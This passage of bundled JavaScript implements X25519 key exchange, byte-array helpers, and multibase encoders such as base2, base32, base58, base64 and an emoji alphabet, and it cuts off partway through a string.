    for(let i = 0; i < 31; i++)z[i] = n[i];
    z[31] = n[31] & 127 | 64;
    z[0] &= 248;
    $569072827d3d60aa$var$unpack25519(x, p);
    for(let i = 0; i < 16; i++)b[i] = x[i];
    a[0] = d[0] = 1;
    for(let i = 254; i >= 0; --i){
        const r = z[i >>> 3] >>> (i & 7) & 1;
        $569072827d3d60aa$var$sel25519(a, b, r);
        $569072827d3d60aa$var$sel25519(c, d, r);
        $569072827d3d60aa$var$add(e, a, c);
        $569072827d3d60aa$var$sub(a, a, c);
        $569072827d3d60aa$var$add(c, b, d);
        $569072827d3d60aa$var$sub(b, b, d);
        $569072827d3d60aa$var$square(d, e);
        $569072827d3d60aa$var$square(f, a);
        $569072827d3d60aa$var$mul(a, c, a);
        $569072827d3d60aa$var$mul(c, b, e);
        $569072827d3d60aa$var$add(e, a, c);
        $569072827d3d60aa$var$sub(a, a, c);
        $569072827d3d60aa$var$square(b, a);
        $569072827d3d60aa$var$sub(c, d, f);
        $569072827d3d60aa$var$mul(a, c, $569072827d3d60aa$var$_121665);
        $569072827d3d60aa$var$add(a, a, d);
        $569072827d3d60aa$var$mul(c, c, a);
        $569072827d3d60aa$var$mul(a, d, f);
        $569072827d3d60aa$var$mul(d, b, x);
        $569072827d3d60aa$var$square(b, e);
        $569072827d3d60aa$var$sel25519(a, b, r);
        $569072827d3d60aa$var$sel25519(c, d, r);
    }
    for(let i = 0; i < 16; i++){
        x[i + 16] = a[i];
        x[i + 32] = c[i];
        x[i + 48] = b[i];
        x[i + 64] = d[i];
    }
    const x32 = x.subarray(32);
    const x16 = x.subarray(16);
    $569072827d3d60aa$var$inv25519(x32, x32);
    $569072827d3d60aa$var$mul(x16, x16, x32);
    const q = new Uint8Array(32);
    $569072827d3d60aa$var$pack25519(q, x16);
    return q;
}
$569072827d3d60aa$exports.scalarMult = $569072827d3d60aa$var$scalarMult;
function $569072827d3d60aa$var$scalarMultBase(n) {
    return $569072827d3d60aa$var$scalarMult(n, $569072827d3d60aa$var$_9);
}
$569072827d3d60aa$exports.scalarMultBase = $569072827d3d60aa$var$scalarMultBase;
function $569072827d3d60aa$var$generateKeyPairFromSeed(seed) {
    if (seed.length !== $569072827d3d60aa$exports.SECRET_KEY_LENGTH) throw new Error(`x25519: seed must be ${$569072827d3d60aa$exports.SECRET_KEY_LENGTH} bytes`);
    const secretKey = new Uint8Array(seed);
    const publicKey = $569072827d3d60aa$var$scalarMultBase(secretKey);
    return {
        publicKey: publicKey,
        secretKey: secretKey
    };
}
$569072827d3d60aa$exports.generateKeyPairFromSeed = $569072827d3d60aa$var$generateKeyPairFromSeed;
function $569072827d3d60aa$var$generateKeyPair(prng) {
    const seed = (0, $73945d82524e104e$exports.randomBytes)(32, prng);
    const result = $569072827d3d60aa$var$generateKeyPairFromSeed(seed);
    (0, $276678191c4bdb56$exports.wipe)(seed);
    return result;
}
$569072827d3d60aa$exports.generateKeyPair = $569072827d3d60aa$var$generateKeyPair;
/**
 * Returns a shared key between our secret key and a peer's public key.
 *
 * Throws an error if the given keys are of wrong length.
 *
 * If rejectZero is true throws if the calculated shared key is all-zero.
 * From RFC 7748:
 *
 * > Protocol designers using Diffie-Hellman over the curves defined in
 * > this document must not assume "contributory behavior".  Specially,
 * > contributory behavior means that both parties' private keys
 * > contribute to the resulting shared key.  Since curve25519 and
 * > curve448 have cofactors of 8 and 4 (respectively), an input point of
 * > small order will eliminate any contribution from the other party's
 * > private key.  This situation can be detected by checking for the all-
 * > zero output, which implementations MAY do, as specified in Section 6.
 * > However, a large number of existing implementations do not do this.
 *
 * IMPORTANT: the returned key is a raw result of scalar multiplication.
 * To use it as a key material, hash it with a cryptographic hash function.
 */ function $569072827d3d60aa$var$sharedKey(mySecretKey, theirPublicKey, rejectZero = false) {
    if (mySecretKey.length !== $569072827d3d60aa$exports.PUBLIC_KEY_LENGTH) throw new Error("X25519: incorrect secret key length");
    if (theirPublicKey.length !== $569072827d3d60aa$exports.PUBLIC_KEY_LENGTH) throw new Error("X25519: incorrect public key length");
    const result = $569072827d3d60aa$var$scalarMult(mySecretKey, theirPublicKey);
    if (rejectZero) {
        let zeros = 0;
        for(let i = 0; i < result.length; i++)zeros |= result[i];
        if (zeros === 0) throw new Error("X25519: invalid shared key");
    }
    return result;
}
$569072827d3d60aa$exports.sharedKey = $569072827d3d60aa$var$sharedKey;


var $74e9859baf4497ef$exports = {};
"use strict";
Object.defineProperty($74e9859baf4497ef$exports, "__esModule", {
    value: true
});
var $3a397656998e9fe7$exports = {};
"use strict";
Object.defineProperty($3a397656998e9fe7$exports, "__esModule", {
    value: true
});
function $3a397656998e9fe7$var$compare(a, b) {
    for(let i = 0; i < a.byteLength; i++){
        if (a[i] < b[i]) return -1;
        if (a[i] > b[i]) return 1;
    }
    if (a.byteLength > b.byteLength) return 1;
    if (a.byteLength < b.byteLength) return -1;
    return 0;
}
$3a397656998e9fe7$exports.compare = $3a397656998e9fe7$var$compare;


var $475c4a512fd4a246$exports = {};
"use strict";
Object.defineProperty($475c4a512fd4a246$exports, "__esModule", {
    value: true
});
var $6082a548169c7b42$exports = {};
"use strict";
Object.defineProperty($6082a548169c7b42$exports, "__esModule", {
    value: true
});
var $784ac8dd0f23c14d$exports = {};
"use strict";
Object.defineProperty($784ac8dd0f23c14d$exports, "__esModule", {
    value: true
});
function $784ac8dd0f23c14d$var$asUint8Array(buf) {
    if (globalThis.Buffer != null) return new Uint8Array(buf.buffer, buf.byteOffset, buf.byteLength);
    return buf;
}
$784ac8dd0f23c14d$exports.asUint8Array = $784ac8dd0f23c14d$var$asUint8Array;


function $6082a548169c7b42$var$alloc(size = 0) {
    if (globalThis.Buffer != null && globalThis.Buffer.alloc != null) return $784ac8dd0f23c14d$exports.asUint8Array(globalThis.Buffer.alloc(size));
    return new Uint8Array(size);
}
function $6082a548169c7b42$var$allocUnsafe(size = 0) {
    if (globalThis.Buffer != null && globalThis.Buffer.allocUnsafe != null) return $784ac8dd0f23c14d$exports.asUint8Array(globalThis.Buffer.allocUnsafe(size));
    return new Uint8Array(size);
}
$6082a548169c7b42$exports.alloc = $6082a548169c7b42$var$alloc;
$6082a548169c7b42$exports.allocUnsafe = $6082a548169c7b42$var$allocUnsafe;



function $475c4a512fd4a246$var$concat(arrays, length) {
    if (!length) length = arrays.reduce((acc, curr)=>acc + curr.length, 0);
    const output = $6082a548169c7b42$exports.allocUnsafe(length);
    let offset = 0;
    for (const arr of arrays){
        output.set(arr, offset);
        offset += arr.length;
    }
    return $784ac8dd0f23c14d$exports.asUint8Array(output);
}
$475c4a512fd4a246$exports.concat = $475c4a512fd4a246$var$concat;


var $41b0be3b2401ec7e$exports = {};
"use strict";
Object.defineProperty($41b0be3b2401ec7e$exports, "__esModule", {
    value: true
});
function $41b0be3b2401ec7e$var$equals(a, b) {
    if (a === b) return true;
    if (a.byteLength !== b.byteLength) return false;
    for(let i = 0; i < a.byteLength; i++){
        if (a[i] !== b[i]) return false;
    }
    return true;
}
$41b0be3b2401ec7e$exports.equals = $41b0be3b2401ec7e$var$equals;


var $a4ed053a1131469e$exports = {};
"use strict";
Object.defineProperty($a4ed053a1131469e$exports, "__esModule", {
    value: true
});
var $5884b53a084a924d$exports = {};
"use strict";
var $b633fa38a7f8a649$exports = {};
"use strict";
Object.defineProperty($b633fa38a7f8a649$exports, "__esModule", {
    value: true
});
var $fab4e33fc8c0336e$exports = {};
"use strict";
Object.defineProperty($fab4e33fc8c0336e$exports, "__esModule", {
    value: true
});
var $de6c852f920490b4$exports = {};
"use strict";
Object.defineProperty($de6c852f920490b4$exports, "__esModule", {
    value: true
});
var $0340df4a7a7e39d8$exports = {};
"use strict";
function $0340df4a7a7e39d8$var$base(ALPHABET, name) {
    if (ALPHABET.length >= 255) throw new TypeError("Alphabet too long");
    var BASE_MAP = new Uint8Array(256);
    for(var j = 0; j < BASE_MAP.length; j++)BASE_MAP[j] = 255;
    for(var i = 0; i < ALPHABET.length; i++){
        var x = ALPHABET.charAt(i);
        var xc = x.charCodeAt(0);
        if (BASE_MAP[xc] !== 255) throw new TypeError(x + " is ambiguous");
        BASE_MAP[xc] = i;
    }
    var BASE = ALPHABET.length;
    var LEADER = ALPHABET.charAt(0);
    var FACTOR = Math.log(BASE) / Math.log(256);
    var iFACTOR = Math.log(256) / Math.log(BASE);
    function encode(source) {
        if (source instanceof Uint8Array) ;
        else if (ArrayBuffer.isView(source)) source = new Uint8Array(source.buffer, source.byteOffset, source.byteLength);
        else if (Array.isArray(source)) source = Uint8Array.from(source);
        if (!(source instanceof Uint8Array)) throw new TypeError("Expected Uint8Array");
        if (source.length === 0) return "";
        var zeroes = 0;
        var length = 0;
        var pbegin = 0;
        var pend = source.length;
        while(pbegin !== pend && source[pbegin] === 0){
            pbegin++;
            zeroes++;
        }
        var size = (pend - pbegin) * iFACTOR + 1 >>> 0;
        var b58 = new Uint8Array(size);
        while(pbegin !== pend){
            var carry = source[pbegin];
            var i = 0;
            for(var it1 = size - 1; (carry !== 0 || i < length) && it1 !== -1; it1--, i++){
                carry += 256 * b58[it1] >>> 0;
                b58[it1] = carry % BASE >>> 0;
                carry = carry / BASE >>> 0;
            }
            if (carry !== 0) throw new Error("Non-zero carry");
            length = i;
            pbegin++;
        }
        var it2 = size - length;
        while(it2 !== size && b58[it2] === 0)it2++;
        var str = LEADER.repeat(zeroes);
        for(; it2 < size; ++it2)str += ALPHABET.charAt(b58[it2]);
        return str;
    }
    function decodeUnsafe(source) {
        if (typeof source !== "string") throw new TypeError("Expected String");
        if (source.length === 0) return new Uint8Array();
        var psz = 0;
        if (source[psz] === " ") return;
        var zeroes = 0;
        var length = 0;
        while(source[psz] === LEADER){
            zeroes++;
            psz++;
        }
        var size = (source.length - psz) * FACTOR + 1 >>> 0;
        var b256 = new Uint8Array(size);
        while(source[psz]){
            var carry = BASE_MAP[source.charCodeAt(psz)];
            if (carry === 255) return;
            var i = 0;
            for(var it3 = size - 1; (carry !== 0 || i < length) && it3 !== -1; it3--, i++){
                carry += BASE * b256[it3] >>> 0;
                b256[it3] = carry % 256 >>> 0;
                carry = carry / 256 >>> 0;
            }
            if (carry !== 0) throw new Error("Non-zero carry");
            length = i;
            psz++;
        }
        if (source[psz] === " ") return;
        var it4 = size - length;
        while(it4 !== size && b256[it4] === 0)it4++;
        var vch = new Uint8Array(zeroes + (size - it4));
        var j = zeroes;
        while(it4 !== size)vch[j++] = b256[it4++];
        return vch;
    }
    function decode(string) {
        var buffer = decodeUnsafe(string);
        if (buffer) return buffer;
        throw new Error(`Non-${name} character`);
    }
    return {
        encode: encode,
        decodeUnsafe: decodeUnsafe,
        decode: decode
    };
}
var $0340df4a7a7e39d8$var$src = $0340df4a7a7e39d8$var$base;
var $0340df4a7a7e39d8$var$_brrp__multiformats_scope_baseX = $0340df4a7a7e39d8$var$src;
$0340df4a7a7e39d8$exports = $0340df4a7a7e39d8$var$_brrp__multiformats_scope_baseX;


var $4d55dbc11a5f1aec$exports = {};
"use strict";
Object.defineProperty($4d55dbc11a5f1aec$exports, "__esModule", {
    value: true
});
const $4d55dbc11a5f1aec$var$empty = new Uint8Array(0);
const $4d55dbc11a5f1aec$var$toHex = (d)=>d.reduce((hex, byte)=>hex + byte.toString(16).padStart(2, "0"), "");
const $4d55dbc11a5f1aec$var$fromHex = (hex)=>{
    const hexes = hex.match(/../g);
    return hexes ? new Uint8Array(hexes.map((b)=>parseInt(b, 16))) : $4d55dbc11a5f1aec$var$empty;
};
const $4d55dbc11a5f1aec$var$equals = (aa, bb)=>{
    if (aa === bb) return true;
    if (aa.byteLength !== bb.byteLength) return false;
    for(let ii = 0; ii < aa.byteLength; ii++){
        if (aa[ii] !== bb[ii]) return false;
    }
    return true;
};
const $4d55dbc11a5f1aec$var$coerce = (o)=>{
    if (o instanceof Uint8Array && o.constructor.name === "Uint8Array") return o;
    if (o instanceof ArrayBuffer) return new Uint8Array(o);
    if (ArrayBuffer.isView(o)) return new Uint8Array(o.buffer, o.byteOffset, o.byteLength);
    throw new Error("Unknown type, must be binary type");
};
const $4d55dbc11a5f1aec$var$isBinary = (o)=>o instanceof ArrayBuffer || ArrayBuffer.isView(o);
const $4d55dbc11a5f1aec$var$fromString = (str)=>new TextEncoder().encode(str);
const $4d55dbc11a5f1aec$var$toString = (b)=>new TextDecoder().decode(b);
$4d55dbc11a5f1aec$exports.coerce = $4d55dbc11a5f1aec$var$coerce;
$4d55dbc11a5f1aec$exports.empty = $4d55dbc11a5f1aec$var$empty;
$4d55dbc11a5f1aec$exports.equals = $4d55dbc11a5f1aec$var$equals;
$4d55dbc11a5f1aec$exports.fromHex = $4d55dbc11a5f1aec$var$fromHex;
$4d55dbc11a5f1aec$exports.fromString = $4d55dbc11a5f1aec$var$fromString;
$4d55dbc11a5f1aec$exports.isBinary = $4d55dbc11a5f1aec$var$isBinary;
$4d55dbc11a5f1aec$exports.toHex = $4d55dbc11a5f1aec$var$toHex;
$4d55dbc11a5f1aec$exports.toString = $4d55dbc11a5f1aec$var$toString;


class $de6c852f920490b4$var$Encoder {
    constructor(name, prefix, baseEncode){
        this.name = name;
        this.prefix = prefix;
        this.baseEncode = baseEncode;
    }
    encode(bytes) {
        if (bytes instanceof Uint8Array) return `${this.prefix}${this.baseEncode(bytes)}`;
        else throw Error("Unknown type, must be binary type");
    }
}
class $de6c852f920490b4$var$Decoder {
    constructor(name, prefix, baseDecode){
        this.name = name;
        this.prefix = prefix;
        if (prefix.codePointAt(0) === undefined) throw new Error("Invalid prefix character");
        this.prefixCodePoint = prefix.codePointAt(0);
        this.baseDecode = baseDecode;
    }
    decode(text) {
        if (typeof text === "string") {
            if (text.codePointAt(0) !== this.prefixCodePoint) throw Error(`Unable to decode multibase string ${JSON.stringify(text)}, ${this.name} decoder only supports inputs prefixed with ${this.prefix}`);
            return this.baseDecode(text.slice(this.prefix.length));
        } else throw Error("Can only multibase decode strings");
    }
    or(decoder) {
        return $de6c852f920490b4$var$or(this, decoder);
    }
}
class $de6c852f920490b4$var$ComposedDecoder {
    constructor(decoders){
        this.decoders = decoders;
    }
    or(decoder) {
        return $de6c852f920490b4$var$or(this, decoder);
    }
    decode(input) {
        const prefix = input[0];
        const decoder = this.decoders[prefix];
        if (decoder) return decoder.decode(input);
        else throw RangeError(`Unable to decode multibase string ${JSON.stringify(input)}, only inputs prefixed with ${Object.keys(this.decoders)} are supported`);
    }
}
const $de6c852f920490b4$var$or = (left, right)=>new $de6c852f920490b4$var$ComposedDecoder({
        ...left.decoders || {
            [left.prefix]: left
        },
        ...right.decoders || {
            [right.prefix]: right
        }
    });
class $de6c852f920490b4$var$Codec {
    constructor(name, prefix, baseEncode, baseDecode){
        this.name = name;
        this.prefix = prefix;
        this.baseEncode = baseEncode;
        this.baseDecode = baseDecode;
        this.encoder = new $de6c852f920490b4$var$Encoder(name, prefix, baseEncode);
        this.decoder = new $de6c852f920490b4$var$Decoder(name, prefix, baseDecode);
    }
    encode(input) {
        return this.encoder.encode(input);
    }
    decode(input) {
        return this.decoder.decode(input);
    }
}
const $de6c852f920490b4$var$from = ({ name: name, prefix: prefix, encode: encode, decode: decode })=>new $de6c852f920490b4$var$Codec(name, prefix, encode, decode);
const $de6c852f920490b4$var$baseX = ({ prefix: prefix, name: name, alphabet: alphabet })=>{
    const { encode: encode, decode: decode } = $0340df4a7a7e39d8$exports(alphabet, name);
    return $de6c852f920490b4$var$from({
        prefix: prefix,
        name: name,
        encode: encode,
        decode: (text)=>$4d55dbc11a5f1aec$exports.coerce(decode(text))
    });
};
const $de6c852f920490b4$var$decode = (string, alphabet, bitsPerChar, name)=>{
    const codes = {};
    for(let i = 0; i < alphabet.length; ++i)codes[alphabet[i]] = i;
    let end = string.length;
    while(string[end - 1] === "=")--end;
    const out = new Uint8Array(end * bitsPerChar / 8 | 0);
    let bits = 0;
    let buffer = 0;
    let written = 0;
    for(let i = 0; i < end; ++i){
        const value = codes[string[i]];
        if (value === undefined) throw new SyntaxError(`Non-${name} character`);
        buffer = buffer << bitsPerChar | value;
        bits += bitsPerChar;
        if (bits >= 8) {
            bits -= 8;
            out[written++] = 255 & buffer >> bits;
        }
    }
    if (bits >= bitsPerChar || 255 & buffer << 8 - bits) throw new SyntaxError("Unexpected end of data");
    return out;
};
const $de6c852f920490b4$var$encode = (data, alphabet, bitsPerChar)=>{
    const pad = alphabet[alphabet.length - 1] === "=";
    const mask = (1 << bitsPerChar) - 1;
    let out = "";
    let bits = 0;
    let buffer = 0;
    for(let i = 0; i < data.length; ++i){
        buffer = buffer << 8 | data[i];
        bits += 8;
        while(bits > bitsPerChar){
            bits -= bitsPerChar;
            out += alphabet[mask & buffer >> bits];
        }
    }
    if (bits) out += alphabet[mask & buffer << bitsPerChar - bits];
    if (pad) while(out.length * bitsPerChar & 7)out += "=";
    return out;
};
const $de6c852f920490b4$var$rfc4648 = ({ name: name, prefix: prefix, bitsPerChar: bitsPerChar, alphabet: alphabet })=>{
    return $de6c852f920490b4$var$from({
        prefix: prefix,
        name: name,
        encode (input) {
            return $de6c852f920490b4$var$encode(input, alphabet, bitsPerChar);
        },
        decode (input) {
            return $de6c852f920490b4$var$decode(input, alphabet, bitsPerChar, name);
        }
    });
};
$de6c852f920490b4$exports.Codec = $de6c852f920490b4$var$Codec;
$de6c852f920490b4$exports.baseX = $de6c852f920490b4$var$baseX;
$de6c852f920490b4$exports.from = $de6c852f920490b4$var$from;
$de6c852f920490b4$exports.or = $de6c852f920490b4$var$or;
$de6c852f920490b4$exports.rfc4648 = $de6c852f920490b4$var$rfc4648;



const $fab4e33fc8c0336e$var$identity = $de6c852f920490b4$exports.from({
    prefix: "\x00",
    name: "identity",
    encode: (buf)=>$4d55dbc11a5f1aec$exports.toString(buf),
    decode: (str)=>$4d55dbc11a5f1aec$exports.fromString(str)
});
$fab4e33fc8c0336e$exports.identity = $fab4e33fc8c0336e$var$identity;


var $444f725972ab843c$exports = {};
"use strict";
Object.defineProperty($444f725972ab843c$exports, "__esModule", {
    value: true
});

const $444f725972ab843c$var$base2 = $de6c852f920490b4$exports.rfc4648({
    prefix: "0",
    name: "base2",
    alphabet: "01",
    bitsPerChar: 1
});
$444f725972ab843c$exports.base2 = $444f725972ab843c$var$base2;


var $7330be652d1faeae$exports = {};
"use strict";
Object.defineProperty($7330be652d1faeae$exports, "__esModule", {
    value: true
});

const $7330be652d1faeae$var$base8 = $de6c852f920490b4$exports.rfc4648({
    prefix: "7",
    name: "base8",
    alphabet: "01234567",
    bitsPerChar: 3
});
$7330be652d1faeae$exports.base8 = $7330be652d1faeae$var$base8;


var $7c7f7dd3c1547a66$exports = {};
"use strict";
Object.defineProperty($7c7f7dd3c1547a66$exports, "__esModule", {
    value: true
});

const $7c7f7dd3c1547a66$var$base10 = $de6c852f920490b4$exports.baseX({
    prefix: "9",
    name: "base10",
    alphabet: "0123456789"
});
$7c7f7dd3c1547a66$exports.base10 = $7c7f7dd3c1547a66$var$base10;


var $4e3d0e6f3707af45$exports = {};
"use strict";
Object.defineProperty($4e3d0e6f3707af45$exports, "__esModule", {
    value: true
});

const $4e3d0e6f3707af45$var$base16 = $de6c852f920490b4$exports.rfc4648({
    prefix: "f",
    name: "base16",
    alphabet: "0123456789abcdef",
    bitsPerChar: 4
});
const $4e3d0e6f3707af45$var$base16upper = $de6c852f920490b4$exports.rfc4648({
    prefix: "F",
    name: "base16upper",
    alphabet: "0123456789ABCDEF",
    bitsPerChar: 4
});
$4e3d0e6f3707af45$exports.base16 = $4e3d0e6f3707af45$var$base16;
$4e3d0e6f3707af45$exports.base16upper = $4e3d0e6f3707af45$var$base16upper;


var $6d183b7418ac11d8$exports = {};
"use strict";
Object.defineProperty($6d183b7418ac11d8$exports, "__esModule", {
    value: true
});

const $6d183b7418ac11d8$var$base32 = $de6c852f920490b4$exports.rfc4648({
    prefix: "b",
    name: "base32",
    alphabet: "abcdefghijklmnopqrstuvwxyz234567",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32upper = $de6c852f920490b4$exports.rfc4648({
    prefix: "B",
    name: "base32upper",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32pad = $de6c852f920490b4$exports.rfc4648({
    prefix: "c",
    name: "base32pad",
    alphabet: "abcdefghijklmnopqrstuvwxyz234567=",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32padupper = $de6c852f920490b4$exports.rfc4648({
    prefix: "C",
    name: "base32padupper",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567=",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32hex = $de6c852f920490b4$exports.rfc4648({
    prefix: "v",
    name: "base32hex",
    alphabet: "0123456789abcdefghijklmnopqrstuv",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32hexupper = $de6c852f920490b4$exports.rfc4648({
    prefix: "V",
    name: "base32hexupper",
    alphabet: "0123456789ABCDEFGHIJKLMNOPQRSTUV",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32hexpad = $de6c852f920490b4$exports.rfc4648({
    prefix: "t",
    name: "base32hexpad",
    alphabet: "0123456789abcdefghijklmnopqrstuv=",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32hexpadupper = $de6c852f920490b4$exports.rfc4648({
    prefix: "T",
    name: "base32hexpadupper",
    alphabet: "0123456789ABCDEFGHIJKLMNOPQRSTUV=",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32z = $de6c852f920490b4$exports.rfc4648({
    prefix: "h",
    name: "base32z",
    alphabet: "ybndrfg8ejkmcpqxot1uwisza345h769",
    bitsPerChar: 5
});
$6d183b7418ac11d8$exports.base32 = $6d183b7418ac11d8$var$base32;
$6d183b7418ac11d8$exports.base32hex = $6d183b7418ac11d8$var$base32hex;
$6d183b7418ac11d8$exports.base32hexpad = $6d183b7418ac11d8$var$base32hexpad;
$6d183b7418ac11d8$exports.base32hexpadupper = $6d183b7418ac11d8$var$base32hexpadupper;
$6d183b7418ac11d8$exports.base32hexupper = $6d183b7418ac11d8$var$base32hexupper;
$6d183b7418ac11d8$exports.base32pad = $6d183b7418ac11d8$var$base32pad;
$6d183b7418ac11d8$exports.base32padupper = $6d183b7418ac11d8$var$base32padupper;
$6d183b7418ac11d8$exports.base32upper = $6d183b7418ac11d8$var$base32upper;
$6d183b7418ac11d8$exports.base32z = $6d183b7418ac11d8$var$base32z;


var $2478ed668ff199ad$exports = {};
"use strict";
Object.defineProperty($2478ed668ff199ad$exports, "__esModule", {
    value: true
});

const $2478ed668ff199ad$var$base36 = $de6c852f920490b4$exports.baseX({
    prefix: "k",
    name: "base36",
    alphabet: "0123456789abcdefghijklmnopqrstuvwxyz"
});
const $2478ed668ff199ad$var$base36upper = $de6c852f920490b4$exports.baseX({
    prefix: "K",
    name: "base36upper",
    alphabet: "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
});
$2478ed668ff199ad$exports.base36 = $2478ed668ff199ad$var$base36;
$2478ed668ff199ad$exports.base36upper = $2478ed668ff199ad$var$base36upper;


var $bb23e06a31e86f7c$exports = {};
"use strict";
Object.defineProperty($bb23e06a31e86f7c$exports, "__esModule", {
    value: true
});

const $bb23e06a31e86f7c$var$base58btc = $de6c852f920490b4$exports.baseX({
    name: "base58btc",
    prefix: "z",
    alphabet: "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
});
const $bb23e06a31e86f7c$var$base58flickr = $de6c852f920490b4$exports.baseX({
    name: "base58flickr",
    prefix: "Z",
    alphabet: "123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ"
});
$bb23e06a31e86f7c$exports.base58btc = $bb23e06a31e86f7c$var$base58btc;
$bb23e06a31e86f7c$exports.base58flickr = $bb23e06a31e86f7c$var$base58flickr;


var $de0d70bb34ca5e4e$exports = {};
"use strict";
Object.defineProperty($de0d70bb34ca5e4e$exports, "__esModule", {
    value: true
});

const $de0d70bb34ca5e4e$var$base64 = $de6c852f920490b4$exports.rfc4648({
    prefix: "m",
    name: "base64",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",
    bitsPerChar: 6
});
const $de0d70bb34ca5e4e$var$base64pad = $de6c852f920490b4$exports.rfc4648({
    prefix: "M",
    name: "base64pad",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
    bitsPerChar: 6
});
const $de0d70bb34ca5e4e$var$base64url = $de6c852f920490b4$exports.rfc4648({
    prefix: "u",
    name: "base64url",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_",
    bitsPerChar: 6
});
const $de0d70bb34ca5e4e$var$base64urlpad = $de6c852f920490b4$exports.rfc4648({
    prefix: "U",
    name: "base64urlpad",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_=",
    bitsPerChar: 6
});
$de0d70bb34ca5e4e$exports.base64 = $de0d70bb34ca5e4e$var$base64;
$de0d70bb34ca5e4e$exports.base64pad = $de0d70bb34ca5e4e$var$base64pad;
$de0d70bb34ca5e4e$exports.base64url = $de0d70bb34ca5e4e$var$base64url;
$de0d70bb34ca5e4e$exports.base64urlpad = $de0d70bb34ca5e4e$var$base64urlpad;


var $c9e395f0a3e1277d$exports = {};
"use strict";
Object.defineProperty($c9e395f0a3e1277d$exports, "__esModule", {
    value: true
});

const $c9e395f0a3e1277d$var$alphabet = Array.from("\uD83D\uDE80\uD83E\uDE90☄\uD83D\uDEF0\uD83C\uDF0C\uD83C\uDF11\uD83C\uDF12\uD83C\uDF13\uD83C\uDF14\uD83C\uDF15\uD83C\uDF16\uD83C\uDF17\uD83C\uDF18\uD83C\uDF0D\uD83C\uDF0F\uD83C\uDF0E\uD83D\uDC09☀\uD83D\uDCBB\uD83D\uDDA5\uD83D\uDCBE\uD83D\uDCBF\uD83D\uDE02❤\uD83D\uDE0D\uD83E\uDD23\uD83D\uDE0A\uD83D\uDE4F\uD83D\uDC95\uD83D\uDE2D\uD83D\uDE18\uD83D\uDC4D\uD83D\uDE05\uD83D\uDC4F\uD83D\uDE01\uD83D\uDD25\uD83E\uDD70\uD83D\uDC94\uD83D\uDC96\uD83D\uDC99\uD83D\uDE22\uD83E\uDD14\uD83D\uDE06\uD83D\uDE44\uD83D\uDCAA\uD83D\uDE09☺\uD83D\uDC4C\uD83E\uDD17\uD83D\uDC9C\uD83D\uDE14\uD83D\uDE0E\uD83D\uDE07\uD83C\uDF39\uD83E\uDD26\uD83C\uDF89\uD83D\uDC9E✌✨\uD83E\uDD37\uD83D\uDE31\uD83D\uDE0C\uD83C\uDF38\uD83D\uDE4C\uD83D\uDE0B\uD83D\uDC97\uD83D\uDC9A\uD83D\uDE0F\uD83D\uDC9B\uD83D\uDE42\uD83D\uDC93\uD83E\uDD29\uD83D\uDE04\uD83D\uDE00\uD83D\uDDA4\uD83D\uDE03\uD83D\uDCAF\uD83D\uDE48\uD83D\uDC47\uD83C\uDFB6\uD83D\uDE12\uD83E\uDD2D❣\uD83D\uDE1C\uD83D\uDC8B\uD83D\uDC40\uD83D\uDE2A\uD83D\uDE11\uD83D\uDCA5\uD83D\uDE4B\uD83D\uDE1E\uD83D\uDE29\uD83D\uDE21\uD83E\uDD2A\uD83D\uDC4A\uD83E\uDD73\uD83D\uDE25\uD83E\uDD24\uD83D\uDC49\uD83D\uDC83\uD83D\uDE33✋\uD83D\uDE1A\uD83D\uDE1D\uD83D\uDE34\uD83C\uDF1F\uD83D\uDE2C\uD83D\uDE43\uD83C\uDF40\uD83C\uDF37\uD83D\uDE3B\uD83D\uDE13⭐✅\uD83E\uDD7A\uD83C\uDF08\uD83D\uDE08\uD83E\uDD18\uD83D\uDCA6✔\uD83D\uDE23\uD83C\uDFC3\uD83D\uDC90☹\uD83C\uDF8A\uD83D\uDC98\uD83D\uDE20☝\uD83D\uDE15\uD83C\uDF3A\uD83C\uDF82\uD83C\uDF3B\uD83D\uDE10\uD83D\uDD95\uD83D\uDC9D\uD83D\uDE4A\uD83D\uDE39\uD83D\uDDE3\uD83D\uDCAB\uD83D\uDC80\uD83D\uDC51\uD83C\uDFB5\uD83E\uDD1E\uD83D\uDE1B\uD83D\uDD34\uD83D\uDE24\uD83C\uDF3C\uD83D\uDE2B⚽\uD83E\uDD19☕\uD83C\uDFC6\uD83E\uDD2B\uD83D\uDC48\uD83D\uDE2E\uD83D\uDE46\uD83C\uDF7B\uD83C\uDF43\uD83D\uDC36\uD83D\uDC81\uD83D\uDE32\uD83C\uDF3F\uD83E\uDDE1\uD83C\uDF81⚡\uD83C\uDF1E\uD83C\uDF88❌✊\uD83D\uDC4B\uD83D\uDE30\uD83E\uDD28\uD83D\uDE36\uD83E\uDD1D\uD83D\uDEB6\uD83D\uDCB0\uD83C\uDF53\uD83D\uDCA2\uD83E\uDD1F\uD83D\uDE41\uD83D\uDEA8\uD83D\uDCA8\uD83E\uDD2C✈\uD83C\uDF80\uD83C\uDF7A\uD83E\uDD13\uD83D\uDE19\uD83D\uDC9F\uD83C\uDF31\uD83D\uDE16\uD83D\uDC76\uD83E\uDD74▶➡❓\uD83D\uDC8E\uD83D\uDCB8⬇\uD83D\uDE28\uD83C\uDF1A\uD83E\uDD8B\uD83D\uDE37\uD83D\uDD7A⚠\uD83D\uDE45\uD83D\uDE1F\uD83D\uDE35\uD83D\uDC4E\uD83E\uDD32\uD83E\uDD20\uD83E\uDD27\uD83D\uDCCC\uD83D\uDD35\